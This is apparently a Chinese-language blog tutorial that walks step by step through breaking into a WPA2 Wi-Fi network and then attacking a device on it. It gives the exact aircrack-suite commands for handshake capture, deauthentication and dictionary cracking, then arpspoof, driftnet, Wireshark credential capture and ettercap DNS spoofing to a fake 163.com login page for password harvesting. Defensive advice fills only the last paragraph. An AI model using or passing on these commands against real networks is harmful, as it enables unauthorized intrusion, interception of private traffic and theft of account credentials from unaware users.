隨著無線網(wǎng)絡走進我們的生活，在方便了我們的同時又產(chǎn)生了許多的安全問題。如果你不加任何防范的話，無疑是向黑客敞開了大門。黑客一旦入侵了你的無線網(wǎng)，就可以在你毫無察覺的情況下監(jiān)聽你網(wǎng)絡的一舉一動，你的賬號密碼等等一切個人信息將暴露給黑客。

下面，我就來演示一下，無線網(wǎng)是如何被入侵并監(jiān)聽的。

首先我們需要一臺裝有Kali linux系統(tǒng)的攻擊機，還需要一個外置的無線網(wǎng)卡。我這里用的是RT3070L芯片的免驅動網(wǎng)卡，推薦大家也買此類型的。因為我在選購網(wǎng)卡的時候踩過不少的坑，反復換購了好幾款網(wǎng)卡才找到了這個可以兼容kali 4.15內(nèi)核的網(wǎng)卡。

淘寶鏈接分享

kali linux可以到官網(wǎng)下載，今天就不講如何安裝了，大家可以自行百度哈。

先上一張我kali霸氣的桌面截圖

2C7DCFFB124D9F65B68CFCD0A9EEBF56.png

現(xiàn)在開始正式破解，插入我們的無線網(wǎng)卡，然后斷開有線連接，不要使其連接到任何的網(wǎng)絡。

打開終端輸入 ifconfig 可以看到我們的無線網(wǎng)卡 wlan0

QQ20180526-230919.png

如果沒有看到，可能是我們的網(wǎng)卡并沒有啟動。我們可以通過輸入 ifconfig -a 看到wlan0網(wǎng)卡，然后通過 ifconfig wlan0 up 來啟用它。

啟用網(wǎng)卡后我們需要通過 airmon-ng start wlan0開啟網(wǎng)卡的監(jiān)聽模式

QQ20180526-231200.png

開啟后輸入 ifconfig 這時我們可以看到我們的網(wǎng)卡名稱變成了wlan0mon

這時我們就可以通過 airodump-ng wlan0mon 來掃描附近的wifi熱點

QQ20180526-231410.png

這里我用 Xiaomi_0C327 這個熱點來做演示，其中 BSSID 代表這臺路由器的MAC地址 CH代表信道

再開一個終端，用 airodump-ng -c 1 --bssid 34:CE:00:26:0C:1C -w cap wlan0mon 對這臺路由器進行抓包。

-c 代表信道
--bssid 代表路由器的mac地址
-w 指定抓到的包存放在哪個目錄叫什么名字

這個時候我們可以看到此臺路由器下連接了幾臺設備，以及連接設備的mac地址。但是由于設備和路由器是保持連接的狀態(tài)，還沒有辦法抓到設備發(fā)給路由器帶有密碼信息的包。

QQ20180526-231807.png

所以我們要通過發(fā)送給路由器假的認證請求，來把設備踢掉線，當設備自動重新連接的時候，密碼就會被抓到。

再開一個終端，輸入 aireplay-ng -0 10 -a 34:CE:00:26:0C:1C -c 98:CA:33:0A:F2:82 wlan0mon 踢下線

-0 代表發(fā)送認證消息
10 代表發(fā)送10條
-a 指定路由器mac地址
-c 指定設備mac地址

2018-05-26-222514_757x522_scrot.png

當看到 [ WPA handshake: ] 字樣時，代表我們已經(jīng)成功的抓到了握手包。在目錄中我們就可以看到如下圖的幾個文件。

QQ20180526-232105.png

2018-05-26-222919_406x216_scrot.png

最后我們通過跑字典的方式來將密碼找出來。開個終端輸入 aircrack-ng cap-01.cap -w password.txt 爆破

cap-01.cap 是剛剛抓到的包
-w 指定密碼字典

QQ20180526-232355.png

等待一小會兒密碼就破解出來了。當然我這里使用的是單線程，你也可以拿抓到的包去其他一些跑包軟件里去跑，多線程加GPU能力效率要高一些?；蛘呷ゾW(wǎng)上找那些專門做跑包的店鋪，幾十塊錢就可以出結果。

不過，最近暴出WPA2加密協(xié)議有漏洞，黑客可以在路由器和設備間的四次握手中重裝加密密鑰，這種攻擊方式稱之為KRACK。也就是說可以無視密碼直接連入wifi，不用再進行這些無聊的抓包跑包。據(jù)說這些漏洞存在于WPA2協(xié)議當中，而非單個產(chǎn)品或實現(xiàn)當中。因此，任何使用WPA2協(xié)議的無線網(wǎng)絡均可能受到影響。

也不知道現(xiàn)在這個漏洞還能不能利用，找時間測試一下。

好，內(nèi)網(wǎng)滲透的第一步我們已經(jīng)完成了，接下來我們要對目標機進行ARP欺騙和DNS劫持。

打開終端輸入 airmon-ng stop wlan0mon 關閉網(wǎng)卡的監(jiān)聽模式，然后用剛剛得到的密碼連入 Xiaomi_0C327 這個網(wǎng)絡

連入后通過 ifconfig 查看網(wǎng)卡被分配的ip地址，可以推斷出網(wǎng)關地址。

QQ20180527-000135.png

這里我的 wlan0 網(wǎng)卡分配到的地址是 192.168.31.147 所以網(wǎng)關地址應該就是 192.168.31.1

用 nmap 掃描一下網(wǎng)關，我們就可以看到內(nèi)網(wǎng)中存活了那些主機

命令 nmap -sP 192.168.31.1/24

QQ20180527-000941.png

這里我選用 192.168.31.181 這臺機器作為靶機

打開一個終端，開啟自己的流量轉發(fā)，使靶機的流量可以先經(jīng)過攻擊機，然后再到路由器。

命令 echo 1 > /proc/sys/net/ipv4/ip_forward

然后 cat /proc/sys/net/ipv4/ip_forward 如果返回 1 代表轉發(fā)開啟成功

打開一個終端，通過命令 arpspoof -i wlan0 -t 192.168.31.181 -r 192.168.31.1 對靶機進行ARP欺騙

-i 代表網(wǎng)卡
-t 代表靶機的ip
-r 代表網(wǎng)關的ip

2018-05-27-002832_758x507_scrot.png

這時我們的攻擊機已經(jīng)成為了一個中間人，靶機的所有流量都要先經(jīng)過攻擊機，再到路由器。而靶機用戶毫無察覺。

我們先來用一款小工具來監(jiān)聽靶機瀏覽的圖片

打開終端輸入 driftnet -i wlan0 等待出圖

2018-05-27-004114_665x534_scrot.png

娛樂一下的小工具，感覺沒啥用。接下來，我們抓靶機用戶的登錄賬戶和密碼。

終端輸入 wireshark 打開wireshark抓包工具，選擇我們的 wlan0 網(wǎng)卡

2018-05-27-004757_1545x1001_scrot.png

用靶機訪問 http://www.qingtaidu.cn/wp-login.php 這個wp網(wǎng)站的后臺并登錄，然后用攻擊機抓包。加上一些過濾條件，方便尋找。

E0D55CBD-6B06-445B-B5C6-B4FA6DCBC276.png

我們還可以對靶機進行DNS劫持。正常情況下訪問 http://www.163.com/ 是這個樣子

QQ20180527-011336.png

然后用攻擊機對這個網(wǎng)址進行DNS劫持，把他解析到我自己寫的163郵箱的登錄頁面。這樣用戶輸入賬號密碼都會被存下來。

首先在終端輸入命令 vi /etc/ettercap/etter.dns 添加一條解析

www.163.com A 47.94.222.65

然后在嗅探欺騙類工具中打開ettercap，【sniff】>【Unified sniffing】，選擇我們的 wlan0 網(wǎng)卡?！綪lugins】>【Manage the plugins】雙擊 dns_spoof模塊，最后【Start】>【Start sniffing】

這時靶機再訪問 http://www.163.com/ 就會變成這個樣子

QQ20180527-013813.png

以上的嗅探和欺騙都是建立在 http 協(xié)議上的，https 協(xié)議的會失效。網(wǎng)上有教程說用 sslstrip 可以對 https進行降級，試了一下是可以降級，但是瀏覽器會有證書報錯提示，用戶很容易就能發(fā)現(xiàn)問題。

也不知道大牛們有沒有什么更好的方式

好了，說完了攻擊，我們來說說防御。上面所說的嗅探都是建立在內(nèi)網(wǎng)環(huán)境下并且進行了ARP欺騙后的，所以要防守就要注意路由器的安全問題，密碼盡量設置的復雜一下，大小寫加數(shù)字字母符號，這樣被暴力破解的幾率就會減小。路由器和設備進行雙向綁定，防止ARP欺騙。

不早了，今天就說這么多吧！等下一篇文章再分享其他的安全知識。